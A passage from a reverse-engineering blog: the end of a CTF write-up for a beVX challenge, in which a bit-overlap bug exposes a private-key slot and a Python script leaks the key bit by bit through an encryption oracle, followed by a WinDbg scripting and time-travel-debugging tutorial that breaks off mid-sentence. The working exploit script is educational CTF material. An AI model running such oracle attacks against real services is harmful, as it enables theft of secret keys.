const uint32_t NumberOfNumbers = 0x1F;
case Divide:
    arg1_row = 0LL;
    arg2_row = 0LL;
    result_row = 0LL;
    std::cout << "Enter row of arg1, row of arg2 and row of result" << std::endl;
    std::cin >> arg1_row;
    std::cin >> arg2_row;
    std::cin >> result_row;
    store_size = number_store->size & NumberOfNumbers;
    if(arg1_row >= store_size || arg2_row >= store_size || result_row >= store_size)
        goto OutOfRange;

There's a catch though. If we look closer at every instance of code that interacts with the size field of the store there is something a bit weird going on.

catchme.png

In the above screenshot you can see that the highlighted cross-reference looks a bit odd as it is actually changing the size by setting the bit number three (0b1000). If we pull the code for this function we can see the below:

case PrivateKeyEncryption:
    number_store->size |= 8u;
    msg_row = 0uLL;
    key_row = 0uLL;
    std::cout << "Enter row of message, row of key" << std::endl;
    std::cin >> msg_row;
    std::cin >> key_row;
    store_size = number_store->size & NumberOfNumbers;
    if(msg_row >= store_size || key_row >= store_size) {
    number_store->size &= 0xF7u;
    std::cout << "Row number is out of range" << std::cout;

I completely overlooked this detail at first as this bit is properly cleared out on error (with the 0xF7 mask). This bit also sounded to be used as a switch to start or stop the encryption process. I could clearly see it used in the encryption loop like in the below:

while(number_store->size & 8) {
    // do stuff
    std::cout << "Continue Encryption? (y/n)" << std::endl;
    std::cin >> continue_enc;
    if(continue_enc == 'Y' || continue_enc == 'y') {
    // do encryption..stuff
    } else if(continue_enc == 'n' || continue_enc == 'N') {
    number_store->size &= 0xF7u;
    }

The thing is, as this bit overlaps with the 5th bit of the store size, setting it also means that we can now access slots from index 0 up to slot 0x10|8=0x18. If the previous is a bit confusing, consider the following C structure:

union {
    struct {
        size_t x : 3;
        size_t bit3 : 1;
    } s1;
    size_t store_size : 5;
} size = {};

And as we said a bit earlier the key material is stored in the slot number_of_rows + 2 = 0n18.

__int64 realmain(struct_buffer *number_store) {
    nrows = number_of_rows;
    pkey_length = private_key_length;
    pkey = &number_store->numbers[number_of_rows + 2];
    is_pkey_empty = private_key_length == 0;
    number_store->pkey = pkey;
    if(!is_pkey_empty) {
    memmove(pkey, &private_key, pkey_length);
    }
    number_store->pkey->bytes[pkey_length - 1] |= 1u;
    number_store->size = nrows & 0x1F | number_store->size & 0xE0;
    // ...

Cool beans, I guess we now have a way to have the application interact with the slot containing the private key which sounds like... progress, right?

Bending the needle: building an oracle

Being able to access the key through the private key encryption feature is great, but it also doesn't give us much just yet. We need to understand a bit more what this feature is doing before coming up with a way to abuse it. After spending a bit of time reverse-engineering and debugging it, I've broken down its logic into the below steps:

  1. The user enters the slot of the message and the slot of the key (either or both of these slots can be the private key slot),
  2. The number stored into the key slot is copied into the global state; in a field I called keycpy,
  3. Another field in the global state is initialized to 1; I called this one magicnumber,
  4. The actual encryption process consists of: multiplying the magicnumer by itself and multiplying it by the number in the slot of the message (that you previously entered) if the current byte of the key is a one. If the current key byte is a zero then nothing extra happens (see below),
  5. Once the encryption is done or stopped by the user, the resulting magicnumber is stored back inside the message slot (overwriting its previous content).

The prettified code looks like this:

while(number_store->size & 8) {
    // do stuff
    std::cout << "Continue Encryption? (y/n)" << std::endl;
    std::cin >> continue_enc;
    if(continue_enc == 'Y' || continue_enc == 'y') {
    number_store->magicnumber *= number_store->magicnumber;
    if(number_store->keycpy[idx] == 1) {
        uint64_t msg = 0;
        read_number_from_store(&number_store->numbers[msg_slot & 0x7F], &msg);
        number_store->magicnumber *= msg;
    }
    } else if(continue_enc == 'n' || continue_enc == 'N') {
    number_store->size &= 0xF7u;
    }
}

As you might have figured, we have basically two avenues (technically three I guess.. but one is clearly useless :-D). Either we load the private key as the message, or we load it as the key parameter.

If we do the former - based on the encryption logic - we end up with no real control over the way the magicnumber is going to be computed. Keep in mind the numbers in the store are all encrypted with the encrypt function and when the key is retrieved out of the store, it isn't decrypted (it is not a normal get operation) but just memcpy'd to the keycpy field like in the below:

memmove(number_store->keycpy, &number_store->numbers[keyslot], 32);

So even if we can insert a known value in the store, we wouldn't really know what it would look like once encrypted.

If we load the private key as the key though, we now have.. an oracle! As the user can stop the decryption process whenever wanted, the attack could work as follows (assuming you would like to leak one byte of the private key):

  1. Load the value 3 in the slot 0,
  2. Use the private key encryption feature with key slot 18 (where the private key is written at) and message slot 0 (where we loaded the value 3),
  3. Depending on the value of the current byte of the key the value of magicnumber could be either be (1*1)*3=3 or (1*1)=1. If the user stops the encryption then this number is written into the store in the slot 0,
  4. Get the value in slot 0. If the value is 3 then the key byte was a 1, else it was a 0.

Following this little recipe allows us to leak the bit n, which once done allows you to push the encryption one round further and leak bit n + 1.. and so on and so forth.

This is great, but there are still two small details we need to iron out before carrying the attack properly.

The code that runs before the actual encryption scans the keycpy and skips any leading zeros. This means that if the key were 0b00010101 for example, the actual encryption logic we described above would start after skipping the first three leading zeros. In order to know how many of those exists, we can just trigger the private key encryption feature and encrypt... until you cannot anymore (there are only 32 bytes per number so at most you get 32 rounds). You just have to count how many rounds you went through and the difference to 32 is the number of leading zeros.

The second small detail is that we technically don't know in which slot the private key is stored in on the remote server (remember, the shared library isn't provided to us). Which means we need to find that out somehow. Here is what we know:

  1. the key is stored at number_of_rows + 2,
  2. the size of the store is initialized to number_of_rows.

If we combine those two facts we can try to read every single slot from the first one until the latest one. First time, it stops with an 'out of range' exception you have your number_of_rows :-)

Oh yeah by the way, remember this third stupid possibility I mentioned earlier? Using the private key as the slot of both the message and the key would basically end-up in.. overwriting the private key itself so not so useful.

Leaking it like it's hot

Here is my ugly python implementation of the attack:

# Axel '0vercl0k' Souchet - 3-March-2018
import sys
import socket

host = ('192.168.1.41', 31337)

def recv_until(c, s):
    buff = ''
    while True:
        b = c.recv(1)
        buff += b
        if s in buff:
            return buff

    return None

def addn(c, r_n, n):
    recv_until(c, '8. Exit\n')
    c.send('0\n%d\n%d\n' % (r_n, n))

def readn(c, r_n):
    recv_until(c, '8. Exit\n')
    c.send('1\n%d\n' % r_n)
    recv_until(c, 'Result is ')
    res = c.recv(1024).splitlines()
    return int(res[0], 10)

def main():
    r_key = 18
    r_oracle = 0
    # first step is to find out how many 0's the key starts with,
    # to do so we ask for an encryption where the key is the pkey,
    # and we encrypt until we cannot and we count the number of
    # 'Continue Encryption?'. 32 - this number should give us the
    # number of 0s
    n_zeros = 32
    c = socket.create_connection(host)
    addn(c, r_oracle, 1337)
    recv_until(c, '8. Exit\n')
    c.send('6\n%d\n%d\n' % (r_oracle, r_key))
    recv_until(c, 'Continue Encryption? (y/n)\n')
    for _ in range(32):
        c.send('y\n')
        n_zeros -= 1
        if 'Continue Encryption? (y/n)' not in c.recv(1024):
            break

    if n_zeros > 0:
        print 'Found', n_zeros, '0s at the start of the key'

    leaked_key = [ 0 ] * n_zeros
    v_oracle = 3
    # now we can go ahead and leak the key bit by bit (each byte is a bit)
    for i in range(32 - n_zeros):
        which_bit = len(leaked_key) + 1
        bit_idx = which_bit - n_zeros
        c = socket.create_connection(host)
        addn(c, r_oracle, v_oracle)
        # private key encryption
        recv_until(c, '8. Exit\n')
        c.send('6\n%d\n%d\n' % (r_oracle, r_key))
        for _ in range(bit_idx):
            recv_until(c, 'Continue Encryption? (y/n)\n')
            c.send('y\n')

        if which_bit < 32:
            recv_until(c, 'Continue Encryption? (y/n)\n')
            c.send('n\n')

        magic_number = 1
        for b in leaked_key[n_zeros :]:
            magic_number &= 0xffffffff
            magic_number *= magic_number
            if b == 1:
                magic_number *= v_oracle

        magic_number *= magic_number
        magic_number &= 0xffffffff
        n = readn(c, r_oracle)
        bit = 0 if magic_number == n else 1
        leaked_key.append(bit)
        c.close()
        print 'Leaked key: %08x\r' % reduce(lambda x, y: (x * 2) + y, leaked_key),

main()

Which should result in something like below:

leakit.gif

Conclusion

If you enjoyed this write-up you should also have a look at this post authored by the organizers (there's even source code!): beVX Conference Challenge. A funny twist for me was that the encryption and decryption routines called sleep to simulate a delay that could be timed over the network and used as a side-channel. As every time you have a non-zero byte in the key, the message slot has to get read out of the store which... calls into the decrypt function.

I thought this was pretty fun - even if I were to have played the challenge in time I probably wouldn't have noticed the delay as I would have been working with my own dummy implementations of encrypt and decrypt :-)

Totally unrelated but I also have migrated the blog to pelican as I am basically done using octopress and ruby. I think I did an OK job at making it look not too shitty but if you see something that looks ugly as hell feel free to ping me and I'll try my best to fix it up!

Last but not least, special thanks to my mates mongo and yrp604 for proofreading and edits :)

Debugger data model, Javascript & x64 exception handling

Introduction

The main goal of today's post is to show a bit more of what is now possible with the latest Windbg (currently branded "WinDbg Preview" in the Microsoft store) and the time travel debugging tools that Microsoft released a few months ago. When these finally got released, a bit after cppcon2017 this year, I expected a massive pick-up from the security / reverse-engineering industry with a bunch of posts, tools, scripts, etc. To my surprise, this has not happened yet so I have waited patiently for my vacation to write a little something about it myself. So, here goes!

Obviously, one of the most noticeable change in this debugger is the new UI.. but this is not something we will talk about. The second big improvement is .. a decent scripting engine! Until recently, I always had to use pyKD to write automation scripts. This has worked fairly well for years, but I’m glad to move away from it and embrace the new extension model provided by Windbg & Javascript (yes, you read this right). One of the biggest pain point I’ve to deal with with pyKD (aside from the installation process!) is that you had to evaluate many commands and then parse their outputs to extract the bits and pieces you needed. Thankfully, the new debugger data model solves this (or part of this anyway). The third new change is the integration of the time travel debugging (TTD) features discussed in this presentation: Time Travel Debugging: Root Causing Bugs in Commercial Scale Software .

The goal of this post is to leverage all the nifty stuff we will learn to enumerate x64 try/except handlers in Javascript.

So grab yourself a cup of fine coffee and read on :).

Table of contents:

The debugger data model

Overview

What is being called the debugger data model is a hierarchy of objects (methods, properties, values) that are accessible both directly from the debugger's command window and through a Javascript API. The debugger exposes a bunch of information that it is responsible: thread related information, register values, stack trace information, etc. As an extension writer, you can go and expose your feature through the node of your choosing in the hierarchy. Once it is plugged in into the model, it is available for consumption by another script, or through the debugger's command window.

model.png
One really interesting property of this exposed information is that it becomes queryable via operators that have been highly inspired from C#’s LINQ operators. For those who are unfamiliar with them I would suggest looking at Basic LINQ query operations.

First query

Say you would like to find what modules the current @rip is pointing into, you can easily express this through a query using LINQ operators and the data model:

0:001> dx @$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))
@$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))                
    [0x8]            : C:\WINDOWS\SYSTEM32\ntdll.dll

..and you can even check all the information related to this module by clicking on the DML [0x8] link:

0:001> dx -r1 @$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))[8]
@$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))[8]                 : C:\WINDOWS\SYSTEM32\ntdll.dll
    BaseAddress      : 0x7ffc985a0000
    Name             : C:\WINDOWS\SYSTEM32\ntdll.dll
    Size             : 0x1db000

In the previous two samples, there are several interesting points to highlight:

1) dx is the operator to access the data model which is not available through the ?? / ? operators

2) @$name is how you access a variable that you have defined during a debugging session. The debugger itself defines several variables right off the bat just to make querying the model easier: @$curprocess is equivalent to host.currentProcess in Javascript, @cursession is host.currentSession, and @$curthread is host.currentThread. You can also define custom variables yourself, for example:

0:001> dx @$doare = "Diary of a reverse-engineer"
@$doare = "Diary of a reverse-engineer" : Diary of a reverse-engineer
    Length           : 0x1b

0:001> dx "Hello, " + @$doare
"Hello, " + @$doare : Hello, Diary of a reverse-engineer
    Length           : 0x22

0:001> ?? @$doare
Bad register error at '@$doare'

0:001> ? @$doare
Bad register error at '@$doare'

3) To query all the nodes in the @$curprocess hierarchy (if you want to wander through the data model you can just use dx Debugger and click through the DML links):

0:001> dx @$curprocess
@$curprocess                 : cmd.exe [Switch To]
    Name             : cmd.exe
    Id               : 0x874
    Threads         
    Modules         
    Environment

You can also check Debugger.State.DebuggerVariables where you can see the definitions for the variables we just mentioned:

0:001> dx Debugger.State.DebuggerVariables
Debugger.State.DebuggerVariables                
    cursession       : Live user mode: <Local>
    curprocess       : cmd.exe [Switch To]
    curthread        : ntdll!DbgUiRemoteBreakin (00007ffc`98675320)  [Switch To]
    scripts         
    scriptContents   : [object Object]
    vars            
    curstack        
    curframe         : ntdll!DbgBreakPoint [Switch To]

0:001> dx Debugger.State.DebuggerVariables.vars
Debugger.State.DebuggerVariables.vars                
    doare            : Diary of a reverse-engineer

4) Last but not least, most of (all?) the iterable objects can be queried through LINQ-style operators. If you’ve never used these it can be a bit weird at the beginning but at some point it will click and then it is just goodness.

Here is the list of the currently available operators on iterable objects in the data model:

Aggregate        [Aggregate(AggregateMethod) | Aggregate(InitialSeed, AggregateMethod) | Aggregate(InitialSeed, AggregateMethod, ResultSelectorMethod) - LINQ equivalent method which iterates through the items in the given collection, running the aggregate method on each one and storing the returned result as the current aggregate value. Once the collection has been exhausted, the final accumulated value is returned. An optional result selector method can be specified which transforms the final accumulator value before returning it.]
All              [All(PredicateMethod) - LINQ equivalent method which returns whether all elements in the collection match a given predicate]
AllNonError      [AllNonError(PredicateMethod) - LINQ equivalent method which returns whether all elements in the collection match a given predicate. Errors are ignored if all non-error results match the predicate.]
Any              [Any(PredicateMethod) - LINQ equivalent method which returns whether any element in the collection matches a given predicate]
Average          [Average([ProjectionMethod]) - LINQ equivalent method which finds the average of all values in the enumeration. An optional projection method can be specified that transforms each value before the average is computed.]
Concat           [Concat(InnerCollection) - LINQ equivalent method which returns all elements from both collections, including duplicates.]
Contains         [Contains(Object, [ComparatorMethod]) - LINQ equivalent method which searches for the given element in the sequence using default comparator rules. An optional comparator method can be provided that will be called each time the element is compared against an entry in the sequence.]
Count            [Count() - LINQ equivalent method which returns the number of objects in the collection]
Distinct         [Distinct([ComparatorMethod]) - LINQ equivalent method which returns all distinct objects from the given collection, using default comparison rules. An optional comparator method can be provided to be called each time objects in the collection must be compared.]
Except           [Except(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which returns all distinct objects in the given collection that are NOT found in the inner collection. An optional comparator method can also be specified.]
First            [First([PredicateMethod]) - LINQ equivalent method which returns the first element in the collection or the first which matches an optional predicate]
FirstNonError    [FirstNonError([PredicateMethod]) - LINQ equivalent method which returns the first element in the collection or the first which matches an optional predicate. Any errors encountered are ignored if a valid element is found.]
Flatten          [Flatten([KeyProjectorMethod]) - Method which flattens a tree of collections (or a tree of keys that project to collections via an optional projector method) into a single collection]
GroupBy          [GroupBy(KeyProjectorMethod, [KeyComparatorMethod]) - LINQ equivalent method which groups the collection by unique keys defined via a key projector and optional key comparator]
Intersect        [Intersect(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which returns all distinct objects in the given collection that are also found in the inner collection. An optional comparator method can also be specified.]
Join             [Join(InnerCollection, Outer key selector method, Inner key selector method, Result selector method, [ComparatorMethod]) - LINQ equivalent method which projects a key for each element of the outer collection and each element of the inner collection using the methods provided. If the projected keys from both these elements match, then the result selector method is called with both those values and its output is returned to the user. An optional comparator method can also be specified.]
Last             [Last([PredicateMethod]) - LINQ equivalent method which returns the last element in the collection or the last which matches an optional predicate]
LastNonError     [LastNonError([PredicateMethod]) - LINQ equivalent method which returns the last element in the collection or the last which matches an optional predicate. Any errors are ignored.]
Max              [Max([ProjectionMethod]) - LINQ equivalent method which returns the maximum element using standard comparison rules. An optional projection method can be specified to project the elements of a sequence before comparing them with each other.]
Min              [Min([ProjectionMethod]) - LINQ equivalent method which returns the minimum element using standard comparison rules. An optional projection method can be specified to project the elements of a sequence before comparing them with each other.]
OrderBy          [OrderBy(KeyProjectorMethod, [KeyComparatorMethod]) - LINQ equivalent method which orders the collection via a key projector and optional key comparator in ascending order]
OrderByDescending [OrderByDescending(KeyProjectorMethod, [KeyComparatorMethod]) - LINQ equivalent method which orders the collection via a key projector and optional key comparator in descending order]
Reverse          [Reverse() - LINQ equivalent method which returns the reverse of the supplied enumeration.]
Select           [Select(ProjectionMethod) - LINQ equivalent method which projects the collection to a new collection via calling a projection method on every element]
SequenceEqual    [SequenceEqual(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which goes through the outer and inner collections and makes sure that they are equal (incl. sequence length). An optional comparator can be specified.]
Single           [Single([PredicateMethod]) - LINQ equivalent method which returns the only element in a list, or, if a predicate was specified, the only element that satisfies the predicate. If there are multiple elements that match the criteria, an error is returned.]
Skip             [Skip(Count) - LINQ equivalent method which skips the specified number of elements in the collection and returns all the rest.]
SkipWhile        [SkipWhile(PredicateMethod) - LINQ equivalent method which runs the predicate for each element and skips it as long as it keeps returning true. Once the predicate fails, the rest of the collection is returned.]
Sum              [Sum([ProjectionMethod]) - LINQ equivalent method which sums all the elements in the collection. Can optionally specify a projector method to transform the elements before summation occurs.]
Take             [Take(Count) - LINQ equivalent method which takes the specified number of elements from the collection.]
TakeWhile        [TakeWhile(PredicateMethod) - LINQ equivalent method which runs the predicate for each element and returns it only if the result is successful. Once the predicate fails, no more elements will be taken.]
Union            [Union(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which returns all distinct objects from the given and inner collection. An optional comparator method can also be specified.]
Where            [Where(FilterMethod) - LINQ equivalent method which filters elements in the collection according to when a filter method returns true for a given element]

Now you may be wondering if the model is available with every possible configuration of Windbg? By configuration I mean that you can use the debugger live in user-mode attached to a process, offline looking at a crash-dump of a process, live in kernel-mode, offline looking at a system crash-dump, or off-line looking at a TTD trace.

And yes, the model is accessible with all the previous configurations, and this is awesome. This allows you to, overall, write very generic scripts as long as the information you are mining / exposing is not tied to a specific configuration.

Scripting the model in Javascript

As we described a bit earlier, you can now access programmatically everything that is exposed through the model via Javascript. No more eval or string parsing to extract the information you want, just go find the node exposing what you are after. If this node doesn’t exist, add your own to expose the information you want :)

Javascript integers and Int64

The first thing you need to be aware with Javascript is the fact that integers are encoded in C doubles.. which means your integers are stored in 53 bits. This is definitely a problem as most of the data we deal with are 64 bit integers. In order to address this problem, Windbg exposes a native type to Javascript that is able to store 64 bit integers. The type is called Int64 and most (all?) information available in the data model is through Int64 instances. This type exposes various methods to perform arithmetic and binary operations (if you use the native operators, the Int64 gets converted back to an integer and throws if data is lost during this conversion; cf Auto-conversion). It takes a bit of time to get used to this, but feels natural pretty quickly. Note that the Frida framework exposes a very similar type to address the same issue, which means it will be even easier for you if you have played with Frida in the past!

You can construct an Int64 directly using a native Javascript integers (so at most 53 bits long as described above), or you can use the host.parseInt64 method that takes a string as input. The other very important method you are going to need is Int64.compareTo which returns 1 if the instance is bigger than the argument, 0 if equal and -1 if smaller. The below script shows a summary of the points we touched on:

// Int64.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let a = host.Int64(1337);
    let aplusone = a + 1;
    // 53a
    logln(aplusone.toString(16));
    let b = host.parseInt64('0xdeadbeefbaadc0de', 16);
    let bplusone = b.add(1);
    // 0xdeadbeefbaadc0df
    logln(bplusone.toString(16));
    let bplusonenothrow = b.convertToNumber() + 1;
    // 16045690984229355000
    logln(bplusonenothrow);
    try {
        let bplusonethrow = b + 1;
    } catch(e) {
        // Error: 64 bit value loses precision on conversion to number
        logln(e);
    }
    // 1
    logln(a.compareTo(1));
    // 0
    logln(a.compareTo(1337));
    // -1
    logln(a.compareTo(1338));
}

For more information I would recommend looking at this page JavaScript Debugger Scripting.

Accessing CPU registers

Registers are accessible in the host.currentThread.Registers object. You can access the classical GPRs in the User node, but you can also access the xmm/ymm registers via SIMD and Floating Point nodes. As you may have guessed, the registers are all instances of the Int64 object we just talked about.

Reading memory

You can read raw memory via the host.memory.readMemoryValues function. It allows you to read memory as an array of items whose size you can specify. You can also use host.memory.readString and host.memory.readWideString for reading (narrow/wide) strings directly from memory.

//readmemory.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function read_u64(addr) {
    return host.memory.readMemoryValues(addr, 1, 8)[0];
}

function invokeScript() {
    let Regs = host.currentThread.Registers.User;
    let a = read_u64(Regs.rsp);
    logln(a.toString(16));
    let WideStr = host.currentProcess.Environment.EnvironmentBlock.ProcessParameters.ImagePathName.Buffer;
    logln(host.memory.readWideString(WideStr));
    let WideStrAddress = WideStr.address;
    logln(host.memory.readWideString(WideStrAddress));
}

Executing / evaluating commands

Even though a bunch of data is accessible programmatically via the data model, not everything is exposed today in the model. For example, you cannot access the same amount of information that kp shows you with the Frame model object. Specifically, the addresses of the frames or the saved return addresses are not currently available in the object unfortunately :-( As a result, being able to evaluate commands can still be important.

The API call ExecuteCommand evaluates a command and returns the output of the command as a string:

//eval.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let Control = host.namespace.Debugger.Utility.Control;
    for(let Line of Control.ExecuteCommand('kp')) {
        logln('Line: ' + Line);
    }
}

There is at least one pitfall with this function to be aware of: the API executes until it completes. So, if you use ExecuteCommand to execute let's say gc the call will return only when you encounter any sort of break. If you don't encounter any break, the call will never end.

Setting breakpoints

Settings breakpoints is basically handled by three different APIs: SetBreakpointAtSourceLocation, SetBreakpointAtOffset, and SetBreakpointForReadWrite. The names are pretty self-explanatory so I will not spend much time describing them. Unfortunately, as far as I can tell there is no easy way to bind a breakpoint to a Javascript function that could handle it when it is hit. The objects returned by these APIs have a Command field you can use to trigger a command when the breakpoint fires, as opposed to a function invocation. In essence, it is pretty much the same than when you do bp foo "command".

Hopefully these APIs will become more powerful and more suited for scripting in future versions with the possibility of invoking a Javascript function when triggered, that would pass an object to the function describing why and where the breakpoint triggered, etc.

Here is a simple example:

//breakpoint.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function handle_bp() {
    let Regs = host.currentThread.Registers.User;
    let Args = [ Regs.rcx, Regs.rdx, Regs.r8 ];
    let ArgsS = Args.map(c => c.toString(16));
    let HeapHandle = ArgsS[0];
    let Flags = ArgsS[1];
    let Size = ArgsS[2];
    logln('RtlAllocateHeap: HeapHandle: ' + HeapHandle + ', Flags: ' + Flags + ', Size: ' + Size);
}

function invokeScript() {
    let Control = host.namespace.Debugger.Utility.Control;
    let Regs = host.currentThread.Registers.User;
    let CurrentProcess = host.currentProcess;
    let BreakpointAlreadySet = CurrentProcess.Debug.Breakpoints.Any(
        c => c.OffsetExpression == 'ntdll!RtlAllocateHeap+0x0'
    );

    if(BreakpointAlreadySet == false) {
        let Bp = Control.SetBreakpointAtOffset('RtlAllocateHeap', 0, 'ntdll');
        Bp.Command = '.echo doare; dx @$scriptContents.handle_bp(); gc';
    } else {
        logln('Breakpoint already set.');
    }
    logln('Press "g" to run the target.');
    // let Lines = Control.ExecuteCommand('gc');
    // for(let Line of Lines) {
    //     logln('Line: ' + Line);
    // }
}

This gives:

0:000>
Press "g" to run the target.
0:000> g-
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x82
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x9a
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x40
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x38
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x0, Size: 0x48
@$scriptContents.handle_bp()
...

Now, I find this interface not well suited for scenarios where you need to have a breakpoint that just dumps stuff and keep going, but hopefully in the future this will improve. Let's say you have a function and you’re interested in dumping its arguments/state every time it gets called. If you attempt to do this with the above code, every time the breakpoint is hit the debugger will execute your callback and stop. At this point you have to tell it to keep executing. (Also, feel free to uncomment the last lines of the script to see what happens if you ExecuteCommand('gc') :-)).

One way I found around this limitation is to use evaluation and the bp command:

//breakpoint2.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function handle_bp() {
    let Regs = host.currentThread.Registers.User;
    let Args = [Regs.rcx, Regs.rdx, Regs.r8];
    let ArgsS = Args.map(c => c.toString(16));
    let HeapHandle = ArgsS[0];
    let Flags = ArgsS[1];
    let Size = ArgsS[2];
    logln('RtlAllocateHeap: HeapHandle: ' + HeapHandle + ', Flags: ' + Flags + ', Size: ' + Size);
    if(Args[2].compareTo(0x100) > 0) {
        // stop execution if the allocation size is bigger than 0x100
        return true;
    }
    // keep the execution going if it's a small size
    return false;
}

function invokeScript() {
    let Control = host.namespace.Debugger.Utility.Control;
    let Regs = host.currentThread.Registers.User;
    let CurrentProcess = host.currentProcess;
    let HeapAlloc = host.getModuleSymbolAddress('ntdll', 'RtlAllocateHeap');
    let BreakpointAlreadySet = CurrentProcess.Debug.Breakpoints.Any(
        c => c.Address == HeapAlloc
    );
    if(BreakpointAlreadySet == false) {
        logln('RltAllocateHeap @ ' + HeapAlloc.toString(16));
        Control.ExecuteCommand('bp /w "@$scriptContents.handle_bp()" ' + HeapAlloc.toString(16));
    } else {
        logln('Breakpoint already set.');
    }
    logln('Press "g" to run the target.');
}

Which gives this output:

0:000>
RltAllocateHeap @ 0x7fffc07587a0
Press "g" to run the target.
0:000> g
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x0, Size: 0x48
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x38
...
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x34a
Breakpoint 0 hit
Time Travel Position: 2A51:314
ntdll!RtlAllocateHeap:
00007fff`c07587a0 48895c2408      mov     qword ptr [rsp+8],rbx ss:000000b8`7f39e9a0=000000b87f39e9b0

Of course, yet another way of approaching this problem would be to wrap the script invocation into the command of a breakpoint like this:

bp ntdll!RtlAllocateHeap ".scriptrun c:\foo\script.js"

TTD

For those who are not familiar with Microsoft’s "Time Travel Debugging" toolset, in a nutshell it allows you to record the execution of a process. Once the recording is done, you end up with a trace file written to disk that you can load into the debugger to replay what you just recorded -- a bit like a camera / VCR. If you want to learn more about it, I would highly recommend checking out this presentation: Time Travel Debugging: root causing bugs in commercial scale software.

Even though I won’t cover how recording and replaying a TTD trace in this article, I just wanted to show you in this part how powerful such features can be once coupled with the data model. As you have probably realized by now, the data model is all about extensibility: you can access specific TTD features via the model when you have a trace loaded in the debugger. This section tries to describe them.

TTD.Calls

The first feature I wanted to talked about is TTD.Calls. This API goes through an entire execution trace and finds every unique point in the trace where an API has been called.

0:000> dx -v @$cursession.TTD
@$cursession.TTD                 : [object Object]
    Calls            [Returns call information from the trace for the specified set of symbols: TTD.Calls("module!symbol1", "module!symbol2", ...)]

For each of those points, you have an object describing the call: time travel position (that you can travel to: see TimeStart and TimeEnd below), parameters (leveraging symbols if you have any to know how many parameters the API expects), return value, the thread id, etc.

Here is what it looks like:

0:000> dx -r1 @$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Count()
@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Count() : 0x267

0:000> dx @$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First()
@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First()                
    EventType        : Call
    ThreadId         : 0x1004
    UniqueThreadId   : 0x6
    TimeStart        : 12C1:265 [Time Travel]
    TimeEnd          : 12DE:DC [Time Travel]
    Function         : ntdll!RtlAllocateHeap
    FunctionAddress  : 0x7fffc07587a0
    ReturnAddress    : 0x7fffbdcd9cc1
    ReturnValue      : 0x21b5df71980
    Parameters      

0:000> dx -r1 @$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First().Parameters
@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First().Parameters                
    [0x0]            : 0x21b5df70000
    [0x1]            : 0x8
    [0x2]            : 0x2d8
    [0x3]            : 0x57

Obviously, the collection returned by TTD.Calls can be queried via the same LINQ-like operators we mentioned earlier which is awesome. As an example, asking the following question has never been easier: "How many times did the allocator fail to allocate memory?":

0:000> dx @$Calls=@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Where(c => c.ReturnValue == 0)
@$Calls=@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Where(c => c.ReturnValue == 0)                

0:000> dx @$Calls.Count()
@$Calls.Count()  : 0x0

Note that because the API has been designed in a way that abstracts away ABI-specific details, you can have your query / code working on both x86 & x64 seamlessly. Another important point is that this is much faster than setting a breakpoint manually and running the trace forward to collect this information yourself.

TTD.Memory

The other very powerful feature that was announced fairly recently in version 1.1712.15003 is TTD.Memory. A bit like TTD.Calls, this feature lets you go and find every memory accesses that happened in an execution trace on a specific memory range. And again, it returns to the user a nice object that has all the information you could be potentially interested in (time travel positions, access type, the instruction pointer address, the address of the memory accessed, etc.):

0:000> dx @$Accesses[0]
@$Accesses[0]                
    EventType        : MemoryAccess
    ThreadId         : 0x15e8
    UniqueThreadId   : 0x3
    TimeStart        : F44:2 [Time Travel]
    TimeEnd          : F44:2 [Time Travel]
    AccessType       : Write
    IP               : 0x7fffc07649bf
    Address          : 0xb87f67fa70
    Size             : 0x4
    Value            : 0x0

Here is how you would go and ask it to find out every piece of code that write-accessed (read and execute are also other valid type of access you can query for and combine) the TEB region of the current thread:

0:001> ? @$teb
Evaluate expression: 792409825280 = 000000b8`7f4e6000

0:001> ?? sizeof(_TEB)
unsigned int64 0x1838

0:001> dx @$Accesses=@$cursession.TTD.Memory(0x000000b8`7f4e6000, 0x000000b8`7f4e6000+0x1838, "w")
@$Accesses=@$cursession.TTD.Memory(0x000000b8`7f4e6000, 0x000000b8`7f4e6000+0x1838, "w")                

0:001> dx @$Accesses[0]
@$Accesses[0]                
    EventType        : MemoryAccess
    ThreadId         : 0x15e8
    UniqueThreadId   : 0x3
    TimeStart        : F79:1B [Time Travel]
    TimeEnd          : F79:1B [Time Travel]
    AccessType       : Write
    IP               : 0x7fffc0761bd0
    Address          : 0xb87f4e7710
    Size             : 0x10
    Value            : 0x0

The other beauty of it is that you can travel to the position ID and find out what happened:

